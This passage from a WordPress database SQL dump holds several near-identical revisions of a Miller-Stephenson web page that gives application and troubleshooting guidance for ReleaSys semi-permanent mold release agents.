Department</a></strong></span>. Miller-Stephenson\'s Mold Release Application Guide was designed to set general guidelines for applicators and molders to follow. Each molding operation is different and modifications to the above mentioned process is likely given the diversity and specialization within this field. Please see our Troubleshooting guide below if your are experiencing any issues using our ReleaSys product line.\r\n<p style="text-align: justify;"><span style="text-decoration: underline;"><span style="font-size: 130%;"><strong>Troubleshooting Common Molding Issues</strong></span></span></p>\r\n\r\n<table style="height: 634px;" width="1068">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="241"><span style="text-decoration: underline; font-size: 120%;"><strong>Problem</strong></span></td>\r\n<td style="text-align: center;" width="517"><span style="font-size: 120%;"><span style="text-decoration: underline; color: #ff0000;"><strong>Cause</strong></span></span></td>\r\n<td style="text-align: center;" width="680"><span style="font-size: 120%;"><span style="text-decoration: underline; color: #0000ff;"><strong>Solution</strong></span></span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 105%;"><strong>Complete failure to obtain release</span></strong></td>\r\n<td><span data-text-bg="primary"><span style="color: #ff0000;">›</span><span style="font-size: 105%;">Improperly cured ReleaSys</span></span></td>\r\n<td><span style="font-size: 105%;" data-text-bg="primary">• Mechanical clean mold followed by chemical cleaning; reapply ReleaSys</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 105%;" data-text-bg="primary"><span style="color: #ff0000;">›</span> Mold insufficiently cleaned prior to application preventing  ReleaSys from bonding</span></td>\r\n<td><span style="font-size: 105%;" data-text-bg="primary">• Thoroughly clean mold with bead blasting followed by cleaning with a solvent or high pH detergent.  Reapply ReleaSys.</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 105%;" data-text-bg="primary"><span style="color: #ff0000;">›</span> Phase-separation of ReleaSys as a result of over agitation or mixing</span></td>\r\n<td><span style="font-size: 105%;" data-text-bg="primary">• Examine ReleaSys; If separation occurred replace with fresh material</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><strong>Poor Release in strained molding areas</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Lack of slip due to mold geometry application angle</td>\r\n<td>• Apply one or two extra coats of ReleaSys initially; Re-apply touch-up coats to these areas more frequently</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="241"><strong>Good release but build-up of ReleaSys on mold surface.</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Over-application of ReleaSys</td>\r\n<td>• Thoroughly clean mold and re-apply ReleaSys in lighter coats; Adjust spray gun to dispense lower volume</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="2" width="241"><strong>Good release but parts exhibit blemishes or oily patches</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Over-application of ReleaSys</td>\r\n<td>• Thoroughly clean mold and re-apply ReleaSys in lighter coats; Adjust  spray gun to dispense lower volume</td>\r\n</tr>\r\n<tr>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Insufficient cure time</td>\r\n<td>• Apply lighter coats of ReleaSys and increase cure time allowed and/or increase cure temperature</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><strong>Inability to achieve multiple releases</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Micro-porosity present in mold</td>\r\n<td>• Clean mold; apply 4-5 coats of ReleaSys to seal mold surface allow for  extended cure times on the first 2 coats.</td>\r\n</tr>\r\n<tr>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Mold insufficiently cleaned prior to application preventing  ReleaSys from bonding</td>\r\n<td>• Mechanical clean mold followed by chemical cleaning; reapply ReleaSys</td>\r\n</tr>\r\n<tr>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Improper application; non-uniform coverage</td>\r\n<td>• Clean mold; apply light coats of ReleaSys with 50% overlapp between passes.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="241"><strong>Poor release and/or small particles of molding material left on mold surface</strong>.</td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Micro-porosity present in mold</td>\r\n<td>• Clean mold; apply 4-5 coats of ReleaSys to seal mold surface allow for  extended cure times on the first 2 coats.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n[ux_product_categories ids="21,16" number="10"]\r\n<h3>Technical or Application Support:</h3>\r\n<ul>\r\n 	<li>To learn more about our mold release agents please <a href="https://www.miller-stephenson.com/chemicals/release-agents/">click here.</a></li>\r\n 	<li><strong><a href="https://www.miller-stephenson.com/tech-support/">If you require any further technical or application support please contact our technical staff</a></strong></li>\r\n</ul>\r\n&nbsp;', 'Mold Release Application Guide - Troubleshooting Guide', '', 'inherit', 'closed', 'closed', '', '2694-revision-v1', '', '', '2016-11-09 16:48:46', '2016-11-09 16:48:46', '', 2694, 'https://www.miller-stephenson.com/2694-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2973, 2, '2016-11-09 16:49:46', '2016-11-09 16:49:46', '<div data-canvas-width="370.56179999999995">Miller-Stephenson has generated a mold release application guide to help aid customers with the proper surface preparation and application of its new semi-permanent release agents. Semi-permanent mold release agents are state of the art release agent systems designed to provide superior durability, maximal number of releases per application, and minimal de-molding force. Miller-Stephenson has been at the forefront of developing the most advance release agents for the molding industry.  Our exclusive<strong> <a href="https://www.miller-stephenson.com/chemicals/release-agents/semi-permanent-release-agents/">ReleaSys Semi-Permanent release agents</a></strong> represent the most technological advanced and refined release system available on the market. ReleaSys release agents provide greater operational efficiency by bonding to mold surfaces, creating a durable layer that is resistant to both chemical and mechanical attack. These products are offered in both low-odor, non-flammable solvent-based or water-based formulations.  Our product line offers the following benefits:</div>\r\n<div data-canvas-width="370.56179999999995">\r\n<ul style="text-align: justify;">\r\n 	<li>Very low transfer (contamination) to the molded part</li>\r\n 	<li>Excels at releasing difficult substrates from complex mold geometries</li>\r\n 	<li>High suitability for rubber-to-metal bonding</li>\r\n 	<li>Low levels of in-mold build-up/fouling</li>\r\n 	<li>Promotion of substrate flow (Rubber, Epoxy, Polyurethane, etc)</li>\r\n 	<li>Extremely high release-ease</li>\r\n 	<li>Many releases (high durability) between applications</li>\r\n 	<li>Various slip levels</li>\r\n 	<li>Superb release for all polymer types</li>\r\n 	<li>Applicability for all molding processes</li>\r\n</ul>\r\n<p style="text-align: justify;">While semi-permanent mold release agents offer superior performance and efficiency, their surface preparation and application technique have greater requirements. Failure to follow the correct method of preparation and application has a more dramatic effect on performance than other conventional release agents. Therefore proper training and guidance is critical to maximize the effectiveness, to this end Miller-Stephenson has generated a comprehensive mold release application guide and Troubleshooting common molding issues guide to help aid our customers in applying ReleaSys.</p>\r\n<span style="text-decoration: underline; font-size: 115%;"><strong>Surface-Preparation</strong></span>\r\n<p style="text-align: justify;">Semi-permanent mold release agents require specific preparation of the molding surface in order to maximize surface adhesion, durability, and minimize transfer. <strong>The molds must be thoroughly cleaned, removal of all previous mold release agents or contaminates are critical before application of ReleaSys.</strong> Prior to initial application of ReleaSys, Miller-Stephenson recommends mechanical cleaning with media blasting followed by cleaning with a good general purpose solvent or high-pH cleaning solution. Older molds that have significant buildup and/ or molds that have been coated with waxes, oils, etc should be cleaned with a heavy duty cleaner solvent like Miller-Stephenson\'s MS-557 or MS-552.  A good test is to use masking tape and test for surface adhesion, if the tape adheres to the mold surface than typically your cleaning has been successful.</p>\r\n<span style="font-size: 115%;"><strong><span style="text-decoration: underline;">Application to Mold Surface</span></strong></span>\r\n<p style="text-align: justify;">Miller-Stephenson\'s ReleaSys semi-permanents can be applied by three standard methods: hand-wiping, aerosolization via HVLP gun or aerosolization within a can. Miller-Stephenson strongly recommends application via aerosolization.  Aerosolization minimizes over-application and facilitates the development of a uniform, thin film on the molding surface. Miller-Stephenson offers aerosolized cans of its ReleaSys product line (ie: <a href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents-2/">ReleaSys 82, 85, 88, and 89</a>) which have been optimized to deliver consistent application and coverage. Our aerosol cans use a 100% nonflammable, quick drying,  and low odor formulation which enables applicators to have greater safety and lower exposure. Follow these steps when applying ReleaSys:</p>\r\n\r\n<ol>\r\n 	<li style="text-align: justify;">Gentle agitate ReleaSys, avoiding high shear / high rpm mixing if using bulk and excessive shaking of the aerosol can. Set HVLP gun to appropriate pressure; a typically starting pressure is &gt;40 psi in the airline, 8-10 psi at the gun, and ~2-4 psi at the outlet. Nozzle sizes can vary between 1.0mm to 1.8mm.  Spray 8-10 inches from the surface with approximately 50% overlap.</li>\r\n 	<li style="text-align: justify;">When using solvent-based ReleaSys allow 2-3 minutes between coats and 15-20 minutes after the final coat to allow for a full cure at room temperature.  Miler-Stephenson recommends 2-3 coats to maximize durability and number or releases. Final cure times can be reduced at elevated temperatures. Water-based formulation should be applied to a hot mold (&gt;90 C) with 2-3 light coats followed by a brief cure time (1-3 minutes at &gt; 90 C). Regardless of applications method or carrier solvent, ReleaSys must be applied to the mold surface as a "wet film or wet coat" and allowed to dry on the surface, failure to do so will dramatically effect performance.\r\n<ul>\r\n 	<li style="text-align: justify;"><em>NOTE: Cure time refers to the time required for the polymeric release agent to sufficiently cross-link and adhere to the mold surface. Allowing proper time for cross-linking is critical to performance, this process can be accelerated as a function of increased temperature.  Typically a single heat cycle of the mold is a sufficient means of acceleration.</em></li>\r\n</ul>\r\n</li>\r\n</ol>\r\n<p style="text-align: justify;"><span style="font-size: 115%;"><strong><span style="text-decoration: underline;">Re-application</span></strong></span></p>\r\n\r\n<ol>\r\n 	<li style="text-align: justify;">When release becomes hesitant, immediately reapply one coat of ReleaSys™ in the same manner as described previously. Spot touch-ups can also be done on known high wear or geometrically strained areas.</li>\r\n 	<li style="text-align: justify;">When molding, it is common for operators to use an HVLP gun to spray the entire mold and apply touch-up coats with the aerosol can.  The aerosol can allows for lighter spray volumes and uniform coverage, particularly in areas that are prone to de-molding issues.</li>\r\n</ol>\r\nFor further assistance please contact our <span style="text-decoration: underline;"><strong><a href="https://www.miller-stephenson.com/tech-support/">Technical Service Department</a></strong></span>. Miller-Stephenson\'s Mold Release Application Guide was designed to set general guidelines for applicators and molders to follow. Each molding operation is different and modifications to the above mentioned process is likely given the diversity and specialization within this field. Please see our Troubleshooting guide below if your are experiencing any issues using our ReleaSys product line.\r\n<p style="text-align: justify;"><span style="text-decoration: underline;"><span style="font-size: 130%;"><strong>Troubleshooting Common Molding Issues</strong></span></span></p>\r\n\r\n<table style="height: 634px;" width="1068">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="241"><span style="text-decoration: underline; font-size: 120%;"><strong>Problem</strong></span></td>\r\n<td style="text-align: center;" width="517"><span style="font-size: 120%;"><span style="text-decoration: underline; color: #ff0000;"><strong>Cause</strong></span></span></td>\r\n<td style="text-align: center;" width="680"><span style="font-size: 120%;"><span style="text-decoration: underline; color: #0000ff;"><strong>Solution</strong></span></span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 105%;"><strong>Complete failure to obtain release</span></strong></td>\r\n<td><span style="color: #ff0000;">›</span><span style="font-size: 105%;">Improperly cured ReleaSys</span></td>\r\n<td><span style="font-size: 105%;">• Mechanical clean mold followed by chemical cleaning; reapply ReleaSys</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 105%;" data-text-bg="primary"><span style="color: #ff0000;">›</span> Mold insufficiently cleaned prior to application preventing  ReleaSys from bonding</span></td>\r\n<td><span style="font-size: 105%;" data-text-bg="primary">• Thoroughly clean mold with bead blasting followed by cleaning with a solvent or high pH detergent.  Reapply ReleaSys.</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 105%;" data-text-bg="primary"><span style="color: #ff0000;">›</span> Phase-separation of ReleaSys as a result of over agitation or mixing</span></td>\r\n<td><span style="font-size: 105%;" data-text-bg="primary">• Examine ReleaSys; If separation occurred replace with fresh material</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><strong>Poor Release in strained molding areas</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Lack of slip due to mold geometry application angle</td>\r\n<td>• Apply one or two extra coats of ReleaSys initially; Re-apply touch-up coats to these areas more frequently</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="241"><strong>Good release but build-up of ReleaSys on mold surface.</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Over-application of ReleaSys</td>\r\n<td>• Thoroughly clean mold and re-apply ReleaSys in lighter coats; Adjust spray gun to dispense lower volume</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="2" width="241"><strong>Good release but parts exhibit blemishes or oily patches</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Over-application of ReleaSys</td>\r\n<td>• Thoroughly clean mold and re-apply ReleaSys in lighter coats; Adjust  spray gun to dispense lower volume</td>\r\n</tr>\r\n<tr>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Insufficient cure time</td>\r\n<td>• Apply lighter coats of ReleaSys and increase cure time allowed and/or increase cure temperature</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><strong>Inability to achieve multiple releases</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Micro-porosity present in mold</td>\r\n<td>• Clean mold; apply 4-5 coats of ReleaSys to seal mold surface allow for  extended cure times on the first 2 coats.</td>\r\n</tr>\r\n<tr>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Mold insufficiently cleaned prior to application preventing  ReleaSys from bonding</td>\r\n<td>• Mechanical clean mold followed by chemical cleaning; reapply ReleaSys</td>\r\n</tr>\r\n<tr>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Improper application; non-uniform coverage</td>\r\n<td>• Clean mold; apply light coats of ReleaSys with 50% overlapp between passes.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="241"><strong>Poor release and/or small particles of molding material left on mold surface</strong>.</td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Micro-porosity present in mold</td>\r\n<td>• Clean mold; apply 4-5 coats of ReleaSys to seal mold surface allow for  extended cure times on the first 2 coats.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n[ux_product_categories ids="21,16" number="10"]\r\n<h3>Technical or Application Support:</h3>\r\n<ul>\r\n 	<li>To learn more about our mold release agents please <a href="https://www.miller-stephenson.com/chemicals/release-agents/">click here.</a></li>\r\n 	<li><strong><a href="https://www.miller-stephenson.com/tech-support/">If you require any further technical or application support please contact our technical staff</a></strong></li>\r\n</ul>\r\n&nbsp;', 'Mold Release Application Guide - Troubleshooting Guide', '', 'inherit', 'closed', 'closed', '', '2694-revision-v1', '', '', '2016-11-09 16:49:46', '2016-11-09 16:49:46', '', 2694, 'https://www.miller-stephenson.com/2694-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2974, 2, '2016-11-09 16:50:33', '2016-11-09 16:50:33', '<div data-canvas-width="370.56179999999995">Miller-Stephenson has generated a mold release application guide to help aid customers with the proper surface preparation and application of its new semi-permanent release agents. Semi-permanent mold release agents are state of the art release agent systems designed to provide superior durability, maximal number of releases per application, and minimal de-molding force. Miller-Stephenson has been at the forefront of developing the most advance release agents for the molding industry.  Our exclusive<strong> <a href="https://www.miller-stephenson.com/chemicals/release-agents/semi-permanent-release-agents/">ReleaSys Semi-Permanent release agents</a></strong> represent the most technological advanced and refined release system available on the market. ReleaSys release agents provide greater operational efficiency by bonding to mold surfaces, creating a durable layer that is resistant to both chemical and mechanical attack. These products are offered in both low-odor, non-flammable solvent-based or water-based formulations.  Our product line offers the following benefits:</div>\r\n<div data-canvas-width="370.56179999999995">\r\n<ul style="text-align: justify;">\r\n 	<li>Very low transfer (contamination) to the molded part</li>\r\n 	<li>Excels at releasing difficult substrates from complex mold geometries</li>\r\n 	<li>High suitability for rubber-to-metal bonding</li>\r\n 	<li>Low levels of in-mold build-up/fouling</li>\r\n 	<li>Promotion of substrate flow (Rubber, Epoxy, Polyurethane, etc)</li>\r\n 	<li>Extremely high release-ease</li>\r\n 	<li>Many releases (high durability) between applications</li>\r\n 	<li>Various slip levels</li>\r\n 	<li>Superb release for all polymer types</li>\r\n 	<li>Applicability for all molding processes</li>\r\n</ul>\r\n<p style="text-align: justify;">While semi-permanent mold release agents offer superior performance and efficiency, their surface preparation and application technique have greater requirements. Failure to follow the correct method of preparation and application has a more dramatic effect on performance than other conventional release agents. Therefore proper training and guidance is critical to maximize the effectiveness, to this end Miller-Stephenson has generated a comprehensive mold release application guide and Troubleshooting common molding issues guide to help aid our customers in applying ReleaSys.</p>\r\n<span style="text-decoration: underline; font-size: 115%;"><strong>Surface-Preparation</strong></span>\r\n<p style="text-align: justify;">Semi-permanent mold release agents require specific preparation of the molding surface in order to maximize surface adhesion, durability, and minimize transfer. <strong>The molds must be thoroughly cleaned, removal of all previous mold release agents or contaminates are critical before application of ReleaSys.</strong> Prior to initial application of ReleaSys, Miller-Stephenson recommends mechanical cleaning with media blasting followed by cleaning with a good general purpose solvent or high-pH cleaning solution. Older molds that have significant buildup and/ or molds that have been coated with waxes, oils, etc should be cleaned with a heavy duty cleaner solvent like Miller-Stephenson\'s MS-557 or MS-552.  A good test is to use masking tape and test for surface adhesion, if the tape adheres to the mold surface than typically your cleaning has been successful.</p>\r\n<span style="font-size: 115%;"><strong><span style="text-decoration: underline;">Application to Mold Surface</span></strong></span>\r\n<p style="text-align: justify;">Miller-Stephenson\'s ReleaSys semi-permanents can be applied by three standard methods: hand-wiping, aerosolization via HVLP gun or aerosolization within a can. Miller-Stephenson strongly recommends application via aerosolization.  Aerosolization minimizes over-application and facilitates the development of a uniform, thin film on the molding surface. Miller-Stephenson offers aerosolized cans of its ReleaSys product line (ie: <a href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents-2/">ReleaSys 82, 85, 88, and 89</a>) which have been optimized to deliver consistent application and coverage. Our aerosol cans use a 100% nonflammable, quick drying,  and low odor formulation which enables applicators to have greater safety and lower exposure. Follow these steps when applying ReleaSys:</p>\r\n\r\n<ol>\r\n 	<li style="text-align: justify;">Gentle agitate ReleaSys, avoiding high shear / high rpm mixing if using bulk and excessive shaking of the aerosol can. Set HVLP gun to appropriate pressure; a typically starting pressure is &gt;40 psi in the airline, 8-10 psi at the gun, and ~2-4 psi at the outlet. Nozzle sizes can vary between 1.0mm to 1.8mm.  Spray 8-10 inches from the surface with approximately 50% overlap.</li>\r\n 	<li style="text-align: justify;">When using solvent-based ReleaSys allow 2-3 minutes between coats and 15-20 minutes after the final coat to allow for a full cure at room temperature.  Miler-Stephenson recommends 2-3 coats to maximize durability and number or releases. Final cure times can be reduced at elevated temperatures. Water-based formulation should be applied to a hot mold (&gt;90 C) with 2-3 light coats followed by a brief cure time (1-3 minutes at &gt; 90 C). Regardless of applications method or carrier solvent, ReleaSys must be applied to the mold surface as a "wet film or wet coat" and allowed to dry on the surface, failure to do so will dramatically effect performance.\r\n<ul>\r\n 	<li style="text-align: justify;"><em>NOTE: Cure time refers to the time required for the polymeric release agent to sufficiently cross-link and adhere to the mold surface. Allowing proper time for cross-linking is critical to performance, this process can be accelerated as a function of increased temperature.  Typically a single heat cycle of the mold is a sufficient means of acceleration.</em></li>\r\n</ul>\r\n</li>\r\n</ol>\r\n<p style="text-align: justify;"><span style="font-size: 115%;"><strong><span style="text-decoration: underline;">Re-application</span></strong></span></p>\r\n\r\n<ol>\r\n 	<li style="text-align: justify;">When release becomes hesitant, immediately reapply one coat of ReleaSys™ in the same manner as described previously. Spot touch-ups can also be done on known high wear or geometrically strained areas.</li>\r\n 	<li style="text-align: justify;">When molding, it is common for operators to use an HVLP gun to spray the entire mold and apply touch-up coats with the aerosol can.  The aerosol can allows for lighter spray volumes and uniform coverage, particularly in areas that are prone to de-molding issues.</li>\r\n</ol>\r\nFor further assistance please contact our <span style="text-decoration: underline;"><strong><a href="https://www.miller-stephenson.com/tech-support/">Technical Service Department</a></strong></span>. Miller-Stephenson\'s Mold Release Application Guide was designed to set general guidelines for applicators and molders to follow. Each molding operation is different and modifications to the above mentioned process is likely given the diversity and specialization within this field. Please see our Troubleshooting guide below if your are experiencing any issues using our ReleaSys product line.\r\n<p style="text-align: justify;"><span style="text-decoration: underline;"><span style="font-size: 130%;"><strong>Troubleshooting Common Molding Issues</strong></span></span></p>\r\n\r\n<table style="height: 634px;" width="1068">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="241"><span style="text-decoration: underline; font-size: 120%;"><strong>Problem</strong></span></td>\r\n<td style="text-align: center;" width="517"><span style="font-size: 120%;"><span style="text-decoration: underline; color: #ff0000;"><strong>Cause</strong></span></span></td>\r\n<td style="text-align: center;" width="680"><span style="font-size: 120%;"><span style="text-decoration: underline; color: #0000ff;"><strong>Solution</strong></span></span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 105%;"><strong>Complete failure to obtain release</span></strong></td>\r\n<td><span style="color: #ff0000;">›</span><span style="font-size: 105%;">Improperly cured ReleaSys</span></td>\r\n<td><span style="font-size: 105%;">• Mechanical clean mold followed by chemical cleaning; reapply ReleaSys</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 105%;"><span style="color: #ff0000;">›</span> Mold insufficiently cleaned prior to application preventing  ReleaSys from bonding</span></td>\r\n<td><span style="font-size: 105%;">• Thoroughly clean mold with bead blasting followed by cleaning with a solvent or high pH detergent.  Reapply ReleaSys.</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 105%;"><span style="color: #ff0000;">›</span> Phase-separation of ReleaSys as a result of over agitation or mixing</span></td>\r\n<td><span style="font-size: 105%;">• Examine ReleaSys; If separation occurred replace with fresh material</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><strong>Poor Release in strained molding areas</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Lack of slip due to mold geometry application angle</td>\r\n<td>• Apply one or two extra coats of ReleaSys initially; Re-apply touch-up coats to these areas more frequently</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="241"><strong>Good release but build-up of ReleaSys on mold surface.</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Over-application of ReleaSys</td>\r\n<td>• Thoroughly clean mold and re-apply ReleaSys in lighter coats; Adjust spray gun to dispense lower volume</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="2" width="241"><strong>Good release but parts exhibit blemishes or oily patches</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Over-application of ReleaSys</td>\r\n<td>• Thoroughly clean mold and re-apply ReleaSys in lighter coats; Adjust  spray gun to dispense lower volume</td>\r\n</tr>\r\n<tr>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Insufficient cure time</td>\r\n<td>• Apply lighter coats of ReleaSys and increase cure time allowed and/or increase cure temperature</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><strong>Inability to achieve multiple releases</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Micro-porosity present in mold</td>\r\n<td>• Clean mold; apply 4-5 coats of ReleaSys to seal mold surface allow for  extended cure times on the first 2 coats.</td>\r\n</tr>\r\n<tr>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Mold insufficiently cleaned prior to application preventing  ReleaSys from bonding</td>\r\n<td>• Mechanical clean mold followed by chemical cleaning; reapply ReleaSys</td>\r\n</tr>\r\n<tr>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Improper application; non-uniform coverage</td>\r\n<td>• Clean mold; apply light coats of ReleaSys with 50% overlapp between passes.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="241"><strong>Poor release and/or small particles of molding material left on mold surface</strong>.</td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Micro-porosity present in mold</td>\r\n<td>• Clean mold; apply 4-5 coats of ReleaSys to seal mold surface allow for  extended cure times on the first 2 coats.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n[ux_product_categories ids="21,16" number="10"]\r\n<h3>Technical or Application Support:</h3>\r\n<ul>\r\n 	<li>To learn more about our mold release agents please <a href="https://www.miller-stephenson.com/chemicals/release-agents/">click here.</a></li>\r\n 	<li><strong><a href="https://www.miller-stephenson.com/tech-support/">If you require any further technical or application support please contact our technical staff</a></strong></li>\r\n</ul>\r\n&nbsp;', 'Mold Release Application Guide - Troubleshooting Guide', '', 'inherit', 'closed', 'closed', '', '2694-revision-v1', '', '', '2016-11-09 16:50:33', '2016-11-09 16:50:33', '', 2694, 'https://www.miller-stephenson.com/2694-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2975, 2, '2016-11-09 17:34:40', '2016-11-09 17:34:40', '<h1 data-canvas-width="370.56179999999995"><strong>Mold Release Application Guide -  ReleaSys™ </strong></h1>\n<div data-canvas-width="370.56179999999995">Miller-Stephenson has generated a mold release application guide to help aid customers with the proper surface preparation and application of its new semi-permanent release agents. Semi-permanent mold release agents are state of the art release agent systems designed to provide superior durability, maximal number of releases per application, and minimal de-molding force. Miller-Stephenson has been at the forefront of developing the most advance release agents for the molding industry.  Our exclusive<strong> <a href="https://www.miller-stephenson.com/chemicals/release-agents/semi-permanent-release-agents/">ReleaSys Semi-Permanent release agents</a></strong> represent the most technological advanced and refined release system available on the market. ReleaSys release agents provide greater operational efficiency by bonding to mold surfaces, creating a durable layer that is resistant to both chemical and mechanical attack. These products are offered in both low-odor, non-flammable solvent-based or water-based formulations.  Our product line offers the following benefits:</div>\n<div data-canvas-width="370.56179999999995">\n<ul style="text-align: justify;">\n 	<li>Very low transfer (contamination) to the molded part</li>\n 	<li>Excels at releasing difficult substrates from complex mold geometries</li>\n 	<li>High suitability for rubber-to-metal bonding</li>\n 	<li>Low levels of in-mold build-up/fouling</li>\n 	<li>Promotion of substrate flow (Rubber, Epoxy, Polyurethane, etc)</li>\n 	<li>Extremely high release-ease</li>\n 	<li>Many releases (high durability) between applications</li>\n 	<li>Various slip levels</li>\n 	<li>Superb release for all polymer types</li>\n 	<li>Applicability for all molding processes</li>\n</ul>\n<p style="text-align: justify;">While semi-permanent mold release agents offer superior performance and efficiency, their surface preparation and application technique have greater requirements. Failure to follow the correct method of preparation and application has a more dramatic effect on performance than other conventional release agents. Therefore proper training and guidance is critical to maximize the effectiveness, to this end Miller-Stephenson has generated a comprehensive mold release application guide and Troubleshooting common molding issues guide to help aid our customers in applying ReleaSys.</p>\n\n<h4><span style="text-decoration: underline; font-size: 115%;"><strong>Surface-Preparation</strong></span></h4>\n<p style="text-align: justify;">Semi-permanent mold release agents require specific preparation of the molding surface in order to maximize surface adhesion, durability, and minimize transfer. <strong>The molds must be thoroughly cleaned, removal of all previous mold release agents or contaminates are critical before application of ReleaSys.</strong> Prior to initial application of ReleaSys, Miller-Stephenson recommends mechanical cleaning with media blasting followed by cleaning with a good general purpose solvent or high-pH cleaning solution. Older molds that have significant buildup and/ or molds that have been coated with waxes, oils, etc should be cleaned with a heavy duty cleaner solvent like Miller-Stephenson\'s MS-557 or MS-552.  A good test is to use masking tape and test for surface adhesion, if the tape adheres to the mold surface than typically your cleaning has been successful.</p>\n\n<h4><span style="font-size: 115%;"><strong><span style="text-decoration: underline;">Application to Mold Surface</span></strong></span></h4>\n<p style="text-align: justify;">Miller-Stephenson\'s ReleaSys semi-permanents can be applied by three standard methods: hand-wiping, aerosolization via HVLP gun or aerosolization within a can. Miller-Stephenson strongly recommends application via aerosolization.  Aerosolization minimizes over-application and facilitates the development of a uniform, thin film on the molding surface. Miller-Stephenson offers aerosolized cans of its ReleaSys product line (ie: <a href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents-2/">ReleaSys 82, 85, 88, and 89</a>) which have been optimized to deliver consistent application and coverage. Our aerosol cans use a 100% nonflammable, quick drying,  and low odor formulation which enables applicators to have greater safety and lower exposure. Follow these steps when applying ReleaSys:</p>\n\n<ol>\n 	<li style="text-align: justify;">Gentle agitate ReleaSys, avoiding high shear / high rpm mixing if using bulk and excessive shaking of the aerosol can. Set HVLP gun to appropriate pressure; a typically starting pressure is &gt;40 psi in the airline, 8-10 psi at the gun, and ~2-4 psi at the outlet. Nozzle sizes can vary between 1.0mm to 1.8mm.  Spray 8-10 inches from the surface with approximately 50% overlap.</li>\n 	<li style="text-align: justify;">When using solvent-based ReleaSys allow 2-3 minutes between coats and 15-20 minutes after the final coat to allow for a full cure at room temperature.  Miler-Stephenson recommends 2-3 coats to maximize durability and number or releases. Final cure times can be reduced at elevated temperatures. Water-based formulation should be applied to a hot mold (&gt;90 C) with 2-3 light coats followed by a brief cure time (1-3 minutes at &gt; 90 C). Regardless of applications method or carrier solvent, ReleaSys must be applied to the mold surface as a "wet film or wet coat" and allowed to dry on the surface, failure to do so will dramatically effect performance.\n<ul>\n 	<li style="text-align: justify;"><em>NOTE: Cure time refers to the time required for the polymeric release agent to sufficiently cross-link and adhere to the mold surface. Allowing proper time for cross-linking is critical to performance, this process can be accelerated as a function of increased temperature.  Typically a single heat cycle of the mold is a sufficient means of acceleration.</em></li>\n</ul>\n</li>\n</ol>\n<h4 style="text-align: justify;"><span style="font-size: 115%;"><strong><span style="text-decoration: underline;">Re-application</span></strong></span></h4>\n<ol>\n 	<li style="text-align: justify;">When release becomes hesitant, immediately reapply one coat of ReleaSys™ in the same manner as described previously. Spot 